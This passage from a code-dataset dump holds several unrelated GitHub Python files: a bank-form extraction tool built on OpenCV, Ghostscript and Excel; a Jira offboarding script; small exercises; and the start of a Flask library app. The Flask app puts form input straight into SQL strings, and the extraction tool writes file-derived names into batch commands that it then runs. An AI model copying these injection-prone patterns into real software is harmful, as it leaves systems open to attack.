trigger\")\n tempsplit = message['data']\n runmacro()\n temploop = 1\n \n \n #t1 = threading.Thread(target=runmacro)\n #t1.start()\n #t1.join() \n \n \n #print(\"dasssssss \" + message['data'])\n #session['receive_count'] = session.get('receive_count', 0) + 1\n #emit('my_response_dass',\n # {'data': message['data'], 'count': session['receive_count']})\n #test_message(\"dd\")\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result',\n {'img_resultss': resultimg})\n print(\"emit img_result\")\n\n\t\n@socketio.on('testmy_event', namespace='/test')\ndef test_message_timmer(message):\n global temploop\n if(temploop == 1):\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result',\n {'img_resultss': resultimg})\n print(\"emit img_result\")\n temploop = 0\n else:\n pass\n #db = sqlite3.connect('dassdb')\n #cursor = db.cursor()\n #cursor.execute('''CREATE TABLE users(name TEXT, status TEXT)''')\n #cursor.execute('''SELECT name, status FROM users''')\n #user1 = cursor.fetchone() #retrieve the first row\n #print(user1[0]) #Print the first column retrieved(user's name)\n #all_rows = cursor.fetchall()\n #for row in all_rows:\n # row[0] returns the first column in the 
query (name), row[1] returns email column.\n #print('{0} : {1}, {2}'.format(row[0], row[1], row[2]))\n \n \n #db.commit()\n #db.close()\n \n print(\"Timmer called\" + message)\n \n#@socketio.on('testmessage')\n#def handle_message(testmessage):\n# send(\"Dasstest\")\n\t\n@socketio.on('disconnect', namespace='/test')\ndef test_disconnect():\n print('Client disconnected', request.sid)\n\n\n@socketio.on('my_eventtesting', namespace='/test')\ndef bo_data(message):\n global Customer_ID\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation})\n \n\n@socketio.on('emitstatus', namespace='/test')\ndef status_data(message):\n global valstatus\n global valstatustitle\n emit('my_status',\n {'status' : valstatus, 'text' : valstatustitle})\n\n#from subprocess import Popen\n#p = Popen(\"batch.bat\", cwd=r\"C:\\Path\\to\\batchfolder\")\n#stdout, stderr = p.communicate()\n\n@socketio.on('extract_button', namespace='/test')\ndef test_extract_button(message):\n \n print(\"extract_button : \")\n get_result_image()\n emit('my_bo',\n {'CIN': Customer_ID, 'Name': Salutation, 'Country_of_birth': Country_of_birth, 'Tax_Residence1': Tax_Residence1, 'Tax_Residence2': Tax_Residence2, 'Tax_Residence3': Tax_Residence3, 'Tax_Residence4': Tax_Residence4, 'Tax_Residence5': Tax_Residence5, 'Tax_Residence6': Tax_Residence6, 'Tax_Residence7': Tax_Residence7, 'Tax_Residence8': Tax_Residence8, 'Tax_Residence9': Tax_Residence9})\n print(\"emit bo\")\n emit('img_result', {'img_resultss': resultimg})\n print(\"emit img_result\")\n\n print(\"extract_button ==> \" + message)\n\n\n\n\n\n \n\n\ndef roteimage(fname):\n image = cv2.imread(fname)\n \n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh>0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h,w)=image.shape[:2]\n center = (w//2,h//2)\n M = cv2.getRotationMatrix2D(center,angle,1.0)\n image2 = cv2.imread(fname)\n rotated = cv2.warpAffine(image2,M,(w,h),flags=cv2.INTER_CUBIC,borderMode=cv2.BORDER_REPLICATE)\n #cv2.putText(rotated,\"Angle: {:.2f} degrees\".format(angle),(10,30),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n print(\"[INFO] angel: {:3f}\".format(angle))\n print(angle)\n #cv2.imshow(\"Rotated\",rotated)\n gray = cv2.cvtColor(rotated,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n blur3 = cv2.GaussianBlur(thresh,(5,5),0)\n gray3 = cv2.bitwise_not(blur3)\n cv2.imwrite(str(fname).replace(\".png\",\"r.png\"),gray3)\n #cv2.imwrite(str(fname).replace(\".png\",\"r.png\"),rotated)\n #cv2.waitKey(0)\n\ndef templatematchtax(fname,tname):\n img = cv2.imread(fname,0)\n img2 = img.copy()\n template = cv2.imread(tname,0)\n w, h = template.shape[::-1]\n\n img = img2.copy()\n method = 'cv.TM_CCOEFF_NORMED'\n # Apply template Matching\n #cv2.TM_CCORR_NORMED\n \n res = cv2.matchTemplate(img,template,cv2.TM_CCORR_NORMED)\n print(cv2.minMaxLoc(res))\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n top_left = min_loc\n else:\n top_left = max_loc\n threshold = 0.98\n loc = np.where( res >= threshold)\n for pt in zip(*loc[::-1]):\n print(\"dass\", pt,res)\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (150,150,0), 3)\n height, width = img.shape\n #new_img3=img[pt[1]:pt[1] + h 
+20,pt[0]:pt[0] + w+80]\n new_img3=img[pt[1]-20:pt[1] + h +40,1:width]\n temptname = str(tname).replace(\".png\",\"\")\n print(temptname)\n cv2.imwrite(\"static/\" + str(getpass.getuser() + '_' + temptname + '_result_' + fname).replace(\"r.png\",\".png\"),new_img3)\n cv2.imwrite(\"static/\" +str(getpass.getuser() + '_' + temptname + fname).replace(\".png\",\"m.png\"),img)\n\n\ndef removefile():\n for item in os.listdir():\n if item.startswith(getpass.getuser()) and item != 'selvgnb_123456_Input.pdf' and item != 'selvgnb_123457_Input.pdf' and item!= getpass.getuser() + \"_caseref.txt\":\n os.remove(item)\n\n for item2 in os.listdir(\"static/\"):\n file_path = os.path.join(\"static/\", item2)\n if item2.startswith(getpass.getuser()) and item2 != 'selvgnb_123456_Input.pdf' and item2 != 'selvgnb_123457_Input.pdf' and item!= getpass.getuser() + \"_caseref.txt\":\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #os.remove(item2)\n except:\n print(\"unable to delete \" + item2)\n \n\n\n\ndef createbat(fname):\n global globalfilename\n global caseref\n getpagecount(fname)\n file = open(getpass.getuser() + \"pagecount.txt\", \"r\")\n pagecount = int(file.read())\n f = open(getpass.getuser() + 'GS2.bat','w')\n for x in range(pagecount):\n f.write('\"C:\\Program Files\\gs\\gs9.19\\\\bin\\gswin64c.exe\" -dNOPAUSE -dBATCH -dFirstPage=' + str(x + 1) + ' -dLastPage=' + str(x+1) + ' -sDEVICE=png16m -r200x200 -sOutputFile=\"' + getpass.getuser() + '_' + caseref + '_' + 'DInputPage' + str(x+1) + '.png\" ' + globalfilename + '\\n')\n #f.write('\"C:\\Temp\\Dass\\Software\\gs9.19\\\\bin\\gswin64c.exe\" -dNOPAUSE -dBATCH -dFirstPage=' + str(x + 1) + ' -dLastPage=' + str(x+1) + ' -sDEVICE=png16m -r200x200 -sOutputFile=\"' + getpass.getuser() + '_' + caseref + '_' + 'DInputPage' + str(x+1) + '.png\" ' + globalfilename + '\\n')\n f.close()\n\n\n\ndef removeborder(fname):\n image = cv2.imread(fname)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n #column border\n for i in range(int(len(gray[0]))):\n if int(len(gray)/4) < int(np.count_nonzero(gray[:,i])):\n gray[:,i-25:i+50] = 0\n \n #row border\n for i in range(int(len(gray))):\n if int(len(gray[0])/3) < int(np.count_nonzero(gray[:][i])):\n gray[:][i-50:i+100] = 0\n\n\n gray = cv2.bitwise_not(gray)\n #cv2.imshow(\"draw\", gray)\n cv2.imwrite(str(fname),gray)\n\ndef mainprocess():\n global caseref\n global globalfilename\n global valstatus\n global valstatustitle\n filepath = getpass.getuser() + \"_caseref.txt\" \n with open(filepath) as fp:\n line = fp.readline()\n cnt = 1\n while line:\n globalfilename = str(line.strip())\n print(\"Line {}: {}\".format(cnt, globalfilename))\n a,b,c = globalfilename.split(\"_\")\n caseref = b\n print(\"case ref\" + caseref)\n line = fp.readline()\n cnt += 1\n print(\"image spring is running\")\n createbat(globalfilename)\n #createbat('DassInput.pdf')\n\n p = Popen(getpass.getuser() + \"GS2.bat\")\n stdout, stderr = p.communicate()\n print(stdout,stderr)\n for item in os.listdir():\n if (getpass.getuser() in item) and (caseref in item) and ('DInputPage' in item) and item.endswith('r.png') == False:\n removeborder(item)\n roteimage(item)\n\n for item in os.listdir():\n if (getpass.getuser() in item) and (caseref in item) and ('DInputPage' in item) and item.endswith('r.png'):\n templatematchtax(item,'AccountOpeningForm.png')\n templatematchtax(item,'statementfrequency.png')\n\n get_result_image()\n\t\t\n\ndef getpagecount(fname):\n global globalfilename\n if 
os.path.exists(getpass.getuser() + \"pagecount.txt\"):\n os.remove(getpass.getuser() + \"pagecount.txt\")\n else:\n pass\n #print(\"The file does not exist\")\n \n \n f = open(getpass.getuser() + 'pagecount.bat','w')\n f.write('\"C:\\Program Files\\gs\\gs9.19\\\\bin\\gswin64c.exe\" -q -dNODISPLAY -c \"(' + globalfilename + ') (r) file runpdfbegin pdfpagecount = quit\" > ' + getpass.getuser() + 'pagecount.txt')\n #f.write('\"C:\\Temp\\Dass\\Software\\gs9.19\\\\bin\\gswin64c.exe\" -q -dNODISPLAY -c \"(' + globalfilename+ ') (r) file runpdfbegin pdfpagecount = quit\" > ' + getpass.getuser() + 'pagecount.txt')\n f.close()\n p = Popen(getpass.getuser() + \"pagecount.bat\")\n stdout, stderr = p.communicate()\n \n #print(stdout,stderr)\n #file = open(\"pagecount.txt\", \"r\") \n #print(file.read())\n\ndef get_result_image():\n global resultimg\n resultimg= \"\"\n resultflag = 0\n print(\"Getting result image\")\n for item in os.listdir(\"static/\"):\n if ('_result_' in item) and (getpass.getuser() in item):\n a,b,c,d,e,f = str(item).split(\"_\")\n d1, d2 = f.split(\"Page\")\n d3 = int(d2.replace(\".png\",\"\"))\n resultimg = resultimg + (getpass.getuser() + \" : \" + str(b) + \" : \" + str(d3) + \" : \" + str(e)) + \",\"\n print((getpass.getuser() + \" : \" + str(b) + \" : \" + str(d3) + \" : \" + str(e))) \n resultflag = 1\n if (resultflag == 0):\n resultflag = (getpass.getuser() + \" : \" + str(\"No Match\") + \" : \" + str(\"\") + \" : \" + str(\"\"))\n\n\ndef runmacro():\n global valstatus\n global valstatustitle\n print(\"running macro\")\n #test_message(\"ddd\")\n removefile()\n \n \n global Customer_ID\n global Surname\n global First_Name\n global Other_Names\n global Title\n global suffix\n global Salutation\n global Gender\n global Deceased_Date\n global Date_of_Birth\n global Country_of_birth\n global Place_of_Birth\n global Tax_Residence1\n global Tax_Residence2\n global Tax_Residence3\n global Tax_Residence4\n global Tax_Residence5\n global Tax_Residence6\n global Tax_Residence7\n global Tax_Residence8\n global Tax_Residence9\n global Tax_Residence10\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n global permanet_add_1\n global permanet_add_2\n global permanet_add_3\n global permanet_add_4\n global permanet_add_5\n global PostCode\n global Country_of_Residence\n global Home_No\n global Business_No\n global Mobile_No\n global Email_Add\n global Nanpa_Country_Home\n global Nanpa_Code_Home\n global Nanpa_Country_Bus\n global Nanpa_Code_Bus\n global Nanpa_Country_Mob\n global Nanpa_Code_Mob\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n \n global tempsplit\n global xl\n global threadflag\n #if os.path.exists(\"AI_CTO.xlsm\"):\n #xl=win32com.client.Dispatch(\"Excel.Application\")\n #xl.Workbooks.Open(os.path.abspath(\"AI_CTO.xlsm\"), ReadOnly=1)\n \n if os.path.exists(\"AI_CTO.xlsm\"):\n print(\"xl object\")\n xl=win32com.client.Dispatch(\"Excel.Application\")\n xl.Workbooks.Open(os.path.abspath(\"AI_CTO.xlsm\"), ReadOnly=0)\n wsref = xl.Worksheets(\"Ref\")\n else:\n print(\"Unable to open the excel\")\n \n ws = 
xl.Worksheets(\"Ref\")\n wsbo = xl.Worksheets(\"BOData\")\n #ws.Cells(1,1).Value = \"Cell A1\"\n #ws.Cells(1,1).Offset(2,4).Value = \"Cell D2\"\n a,s,c = tempsplit.split(\":\")\n ws.Range(\"B1\").Value = str(\"'\" + a)\n ws.Range(\"B2\").Value = str(\"'\" + s)\n ws.Range(\"B3\").Value = str(\"'\" + c)\n xl.Application.Run(\"AI_CTO.xlsm!ModProcess.dass\")\n \n #xl.Application.Run(\"AI_CTO.xlsm!ModProcess.BOExtract\")\n xl.DisplayAlerts = False \n xl.Application.Save() # if you want to save then uncomment this line and change delete the \", ReadOnly=1\" part from the open function.\n xl.DisplayAlerts = True\n valstatus = \"50%\"\n status_data(\"\")\n \n Customer_ID = wsbo.Range(\"G2\").Value\n Surname = wsbo.Range(\"H2\").Value\n First_Name = wsbo.Range(\"I2\").Value\n Other_Names = wsbo.Range(\"J2\").Value\n Title = wsbo.Range(\"K2\").Value\n suffix = wsbo.Range(\"L2\").Value\n Salutation = wsbo.Range(\"M2\").Value\n Gender = wsbo.Range(\"N2\").Value\n Deceased_Date = wsbo.Range(\"O2\").Value\n Date_of_Birth = wsbo.Range(\"P2\").Value\n Country_of_birth = wsbo.Range(\"Q2\").Value\n Place_of_Birth = wsbo.Range(\"R2\").Value\n Tax_Residence1 = wsbo.Range(\"AA2\").Value\n Tax_Residence2 = wsbo.Range(\"AB2\").Value\n Tax_Residence3 = wsbo.Range(\"AC2\").Value\n Tax_Residence4 = wsbo.Range(\"AD2\").Value\n Tax_Residence5 = wsbo.Range(\"AE2\").Value\n Tax_Residence6 = wsbo.Range(\"AF2\").Value\n Tax_Residence7 = wsbo.Range(\"AG2\").Value\n Tax_Residence8 = wsbo.Range(\"AH2\").Value\n Tax_Residence9 = wsbo.Range(\"AI2\").Value\n Tax_Residence10 = wsbo.Range(\"AJ2\").Value\n Tax_Reference_no_1 = wsbo.Range(\"AK2\").Value\n Tax_Reference_no_2 = wsbo.Range(\"AL2\").Value\n Tax_Reference_no_3 = wsbo.Range(\"AM2\").Value\n Tax_Reference_no_4 = wsbo.Range(\"AN2\").Value\n Tax_Reference_no_5 = wsbo.Range(\"AO2\").Value\n Tax_Reference_no_6 = wsbo.Range(\"AP2\").Value\n Tax_Reference_no_7 = wsbo.Range(\"AQ2\").Value\n Tax_Reference_no_8 = wsbo.Range(\"AR2\").Value\n Tax_Reference_no_9 = wsbo.Range(\"AS2\").Value\n Tax_Reference_no_10 = wsbo.Range(\"AT2\").Value\n permanet_add_1 = wsbo.Range(\"AV2\").Value\n permanet_add_2 = wsbo.Range(\"AW2\").Value\n permanet_add_3 = wsbo.Range(\"AX2\").Value\n permanet_add_4 = wsbo.Range(\"AY2\").Value\n permanet_add_5 = wsbo.Range(\"AZ2\").Value\n PostCode = wsbo.Range(\"BA2\").Value\n Country_of_Residence = wsbo.Range(\"BB2\").Value\n Home_No = wsbo.Range(\"BC2\").Value\n Business_No = wsbo.Range(\"BD2\").Value\n Mobile_No = wsbo.Range(\"BE2\").Value\n Email_Add = wsbo.Range(\"BF2\").Value\n Nanpa_Country_Home = wsbo.Range(\"BJ2\").Value\n Nanpa_Code_Home = wsbo.Range(\"BK2\").Value\n Nanpa_Country_Bus = wsbo.Range(\"BL2\").Value\n Nanpa_Code_Bus = wsbo.Range(\"BM2\").Value\n Nanpa_Country_Mob = wsbo.Range(\"BN2\").Value\n Nanpa_Code_Mob = wsbo.Range(\"BO2\").Value\n Tax_Reference_no_1 = wsbo.Range(\"BP2\").Value\n Tax_Reference_no_2 = wsbo.Range(\"BQ2\").Value\n Tax_Reference_no_3 = wsbo.Range(\"BR2\").Value\n Tax_Reference_no_4 = wsbo.Range(\"BS2\").Value\n Tax_Reference_no_5 = wsbo.Range(\"BT2\").Value\n Tax_Reference_no_6 = wsbo.Range(\"BU2\").Value\n Tax_Reference_no_7 = wsbo.Range(\"BV2\").Value\n Tax_Reference_no_8 = wsbo.Range(\"BW2\").Value\n Tax_Reference_no_9 = wsbo.Range(\"BX2\").Value\n Tax_Reference_no_10 = wsbo.Range(\"BY2\").Value\n\n\n print(\"Customer_ID : \" + str(Customer_ID))\n xl.Application.Quit() # Comment this out if your excel script closes\n #if threadflag == 0:\n \n # threadflag = 1\n # threading.Thread(target=mainprocess).start()\n \n 
mainprocess()\n print(\"main process completed\")\n ctypes.windll.user32.MessageBoxW(0, \"Process has been completed. please click Show Result button.\", \"Agile Automation\", 0)\n #del xl\n\n \ndef clarevar():\n global Customer_ID\n global Surname\n global First_Name\n global Other_Names\n global Title\n global suffix\n global Salutation\n global Gender\n global Deceased_Date\n global Date_of_Birth\n global Country_of_birth\n global Place_of_Birth\n global Tax_Residence1\n global Tax_Residence2\n global Tax_Residence3\n global Tax_Residence4\n global Tax_Residence5\n global Tax_Residence6\n global Tax_Residence7\n global Tax_Residence8\n global Tax_Residence9\n global Tax_Residence10\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n global permanet_add_1\n global permanet_add_2\n global permanet_add_3\n global permanet_add_4\n global permanet_add_5\n global PostCode\n global Country_of_Residence\n global Home_No\n global Business_No\n global Mobile_No\n global Email_Add\n global Nanpa_Country_Home\n global Nanpa_Code_Home\n global Nanpa_Country_Bus\n global Nanpa_Code_Bus\n global Nanpa_Country_Mob\n global Nanpa_Code_Mob\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n\n Customer_ID = \"\"\n Surname = \"\"\n First_Name = \"\"\n Other_Names = \"\"\n Title = \"\"\n suffix = \"\"\n Salutation = \"\"\n Gender = \"\"\n Deceased_Date = \"\"\n Date_of_Birth = \"\"\n Country_of_birth = \"\"\n Place_of_Birth = \"\"\n Tax_Residence1 = \"\"\n Tax_Residence2 = \"\"\n Tax_Residence3 = \"\"\n Tax_Residence4 = \"\"\n Tax_Residence5 = \"\"\n Tax_Residence6 = \"\"\n Tax_Residence7 = \"\"\n Tax_Residence8 = \"\"\n Tax_Residence9 = \"\"\n Tax_Residence10 = \"\"\n Tax_Reference_no_1 = \"\"\n Tax_Reference_no_2 = \"\"\n Tax_Reference_no_3 = \"\"\n Tax_Reference_no_4 = \"\"\n Tax_Reference_no_5 = \"\"\n Tax_Reference_no_6 = \"\"\n Tax_Reference_no_7 = \"\"\n Tax_Reference_no_8 = \"\"\n Tax_Reference_no_9 = \"\"\n Tax_Reference_no_10 = \"\"\n permanet_add_1 = \"\"\n permanet_add_2 = \"\"\n permanet_add_3 = \"\"\n permanet_add_4 = \"\"\n permanet_add_5 = \"\"\n PostCode = \"\"\n Country_of_Residence = \"\"\n Home_No = \"\"\n Business_No = \"\"\n Mobile_No = \"\"\n Email_Add = \"\"\n Nanpa_Country_Home = \"\"\n Nanpa_Code_Home = \"\"\n Nanpa_Country_Bus = \"\"\n Nanpa_Code_Bus = \"\"\n Nanpa_Country_Mob = \"\"\n Nanpa_Code_Mob = \"\"\n Tax_Reference_no_1 = \"\"\n Tax_Reference_no_2 = \"\"\n Tax_Reference_no_3 = \"\"\n Tax_Reference_no_4 = \"\"\n Tax_Reference_no_5 = \"\"\n Tax_Reference_no_6 = \"\"\n Tax_Reference_no_7 = \"\"\n Tax_Reference_no_8 = \"\"\n Tax_Reference_no_9 = \"\"\n Tax_Reference_no_10 = \"\"\n\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"sphnixdass/OpenCV","sub_path":"CTO3.py","file_name":"CTO3.py","file_ext":"py","file_size_in_byte":22961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3065761812","text":"N=int(input())\ninputlist=[]\nfor _ in range(N):\n\tinputlist.append(input().split())\n\t\nfor In in 
inputlist:\n\tposlist=[]\n\thousecount=int(In[0])\n\tfor i in range(1,housecount+1):\n\t\tposlist.append(int(In[i]))\n\tposlist.sort()\n\tzitohouse=poslist[housecount//2]\n\tSum=0\n\tfor j in poslist:\n\t\tSum+=(abs(j-zitohouse))\n\tprint(Sum)\n\t\n\n","repo_name":"SoleMin/Algorithmic_Problems","sub_path":"110401/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40880210847","text":"input_doc= \"jesslookedliketimherbrother\"\ndict_of_words=[\"looked\",\"like\",\"her\",\"kite\",\"time\",\"brother\"]\n\n\ndef naive_impl():\n new_input_doc = \"\"\n input_len = len(input_doc)\n i = 1\n k=0\n while i <= input_len:\n for j in range(k,i):\n str = input_doc[j:i]\n if str in dict_of_words:\n temp_word = input_doc[k:j]\n if len(temp_word)>0:\n new_word = temp_word+\" \"+str+\" \"\n else:\n new_word = str+\" \"\n new_input_doc += \"\".join(new_word)\n k = i\n break\n i += 1\n print(new_input_doc)\n\nnaive_impl()\n","repo_name":"akash29/Practice_problems","sub_path":"CCI/17.13_respace.py","file_name":"17.13_respace.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13828414211","text":"def _pystring_format_effects(key=None):\n\n _pystring_format_effects_dict = {\n \"PURPLE\": \"\\\033[95m\",\n \"CYAN\": \"\\\033[96m\",\n \"DARKCYAN\": \"\\\033[36m\",\n \"BLUE\": \"\\\033[94m\",\n \"GREEN\": \"\\\033[92m\",\n \"YELLOW\": \"\\\033[93m\",\n \"RED\": \"\\\033[91m\",\n \"BOLD\": \"\\\033[1m\",\n \"UNDERLINE\": \"\\\033[4m\",\n \"END\": \"\\\033[0m\",\n }\n\n if key != None and key in _pystring_format_effects_dict.keys():\n effect = _pystring_format_effects_dict[key]\n return effect\n else:\n print(\n \"\\\033[91m\\\033[1m{}\\\033[0m is not a valid effect.\\n\\nPlease choose from:\\n\\n{}\".format(\n key, [_key for _key in _pystring_format_effects_dict.keys()]\n )\n )\n\n\ndef _format_string_printing_font(string, formatting_effect=None):\n\n \"\"\"\n Function formats and returns a string using ANSI color codes.\n\n Parameters:\n -----------\n string (required)\n\n formatting_effect (optional)\n default: None\n type: list\n\n Returns:\n --------\n formatted_string\n applies desired formatting to the printed string\n \"\"\"\n\n if type(formatting_effect) != list:\n formatting_effect = [formatting_effect]\n\n formatting_effects = \"\".join(\n [_pystring_format_effects(formatting) for formatting in formatting_effect]\n )\n formatted_string = formatting_effects + string + _pystring_format_effects(\"END\")\n\n return formatted_string\n","repo_name":"mvinyard/vintools","sub_path":"vintools/_utilities/_ux_utils/_pystrings.py","file_name":"_pystrings.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"11251308213","text":"''' Validation of jira request '''\nimport sys\nimport requests\nimport json\nfrom validation.urlcomp import Compose\nfrom plugins import jira, gitlab\nfrom clients.jira import Client as jira_client\nfrom config import config as APPCONFIG\n\njira_client = jira_client()\n\nCompose = Compose()\nAPPCONFIG = APPCONFIG()\n\nclass Validate:\n def __init__(self, env):\n if env not in APPCONFIG['jira']['jqlurl']:\n print('invalid environment')\n sys.exit()\n self._env = env\n self.jira = jira.Jira(env)\n self._base_url = APPCONFIG['jira']['base_url']\n self._headers = {\"content-type\": 
\"application/json\"}\n self._user = APPCONFIG['jira']['basic_auth']['username']\n self._pass = APPCONFIG['jira']['basic_auth']['password']\n self._auth = (self._user, self._pass)\n \n def _get_request(self):\n \"\"\" request creation \"\"\"\n url = Compose.compose_url(method=\"check_issue\", env=self._env)\n req = requests.get(url, auth=self._auth, headers=self._headers)\n return self._handle_response(req)\n\n def _handle_response(self, response):\n \"\"\" handling response return \"\"\"\n print(response)\n return self._check_issues(response.json())\n\n def _check_issues(self, response):\n \"\"\" check if there are any open issues\"\"\"\n if response['total'] == 0:\n print('no new issues for env', self._env)\n return self._count_issues(response)\n \n def _count_issues(self, response):\n \"\"\" check the amount of open issues \"\"\"\n if response['total'] == 1:\n return self._final_validation(\n response['issues'][0]['fields']['description'],\n response['issues'][0]['key'])\n return self._multiple_issues(response)\n \n def _multiple_issues(self, response):\n issue_number = 0\n while issue_number < response['total']:\n self._final_validation(\n response['issues'][issue_number]['fields']['description'],\n response['issues'][issue_number]['key'])\n issue_number += 1\n return issue_number\n\n def _final_validation(self, issue_body, issue_key):\n \"\"\" creation of users to block list \"\"\"\n to_disable = []\n issue = issue_body.split()\n for item in issue:\n mail_position = item.find('@')\n if mail_position != -1:\n current_user = item[:mail_position]\n to_disable.append(current_user)\n if self._env == \"jira\":\n self.jira.disable_access(user=current_user)\n else:\n gitlab.Gitlab().check_instances(current_user)\n return jira_client.update_issue(issue_key, self._env)\n\n def now(self):\n return self._get_request()","repo_name":"Jeffvos/offboard-automation-python","sub_path":"validation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26006208236","text":"import cv2\n\n# 定義劃框框的function\ndef draw_rect(event,x,y,flag,param):\n global pt1,pt2,firstPoint,secondPoint\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if firstPoint and secondPoint:\n pt1 = (0,0)\n pt2 = (0,0)\n firstPoint = False\n secondPoint= False\n \n if firstPoint == False:\n pt1 = (x,y)\n firstPoint = True\n elif secondPoint == False:\n pt2 = (x,y)\n secondPoint = True\n\n# 定義一個變數叫做Cap並使用cv2.VideoCapture()來抓取對應的視訊機\ncap = cv2.VideoCapture(0)\n\n# 定義一些global variable\npt1 = (0,0)\npt2 = (0,0)\nfirstPoint = False\nsecondPoint= False\n\n# 定義視窗名稱\ncv2.namedWindow(\"Test\")\n# 透過setMouseCallBack, cv2就能知道我們在點哪個視窗應該要觸發什麼樣的事件\ncv2.setMouseCallback(\"Test\", draw_rect)\n\n# 透過While迴圈不斷地抓取抓取照片, 因影片其實就是不間斷的照片\nwhile True:\n # 抓取照片\n ret,frame = cap.read()\n\n if firstPoint:\n cv2.circle(frame, pt1,5,(255,0,0),3)\n \n if firstPoint and secondPoint:\n cv2.circle(frame, pt2,5,(255,0,0),3)\n cv2.rectangle(frame,pt1,pt2,(0,0,255),3) \n\n cv2.imshow(\"Test\",frame) \n \n # 透過按q來結束迴圈\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# 將VideoCapture 結束\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"WillyLIFEexp/Learning_OPENCV","sub_path":"Part_4/Drawing_on_Video.py","file_name":"Drawing_on_Video.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35575466436","text":"from flask import render_template, 
request, redirect, url_for\n\nfrom app import app\nfrom app.forms import ReservaForm, EmprestarForm\nfrom app.conn import get_connection, get_cursor\n\n# ============================\n# home\n# ============================\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n    conn = get_connection()\n    cur = get_cursor(conn)\n\n    cur.execute(\"\"\"SELECT * FROM reserva WHERE id_usuario = 1\"\"\")\n    reservas = cur.fetchall()\n\n    cur.execute(\"\"\"SELECT * FROM emprestimo WHERE id_usuario = 1\"\"\")\n    emprestimos = cur.fetchall()\n\n    cur.close()\n    conn.close()\n\n    return render_template('home.html', reservas=reservas, emprestimos=emprestimos)\n\n# ============================\n# Reserva\n# =============================\n\n\n@app.route('/reservar_livro', methods=['POST', 'GET'])\ndef reservar_livro():\n\n    conn = get_connection()\n    cur = get_cursor(conn)\n\n    form = ReservaForm()\n\n    if request.method == 'POST':\n        conn = get_connection()\n        cur = get_cursor(conn)\n\n        Id_usuario = request.form['Id_usuario']\n        Id_livro = request.form['Id_livro']\n\n        cur.execute(\"\"\"INSERT INTO reserva (id_usuario, id_livro) VALUES ('%s', '%s')\"\"\" % (Id_usuario, Id_livro))\n\n        cur.execute(\"\"\"UPDATE livro SET status = 'reservado' WHERE id_livro = '%s'\"\"\" % Id_livro)\n\n        conn.commit()\n\n        return redirect(url_for('home'))\n\n    cur.execute(\"\"\"SELECT * FROM 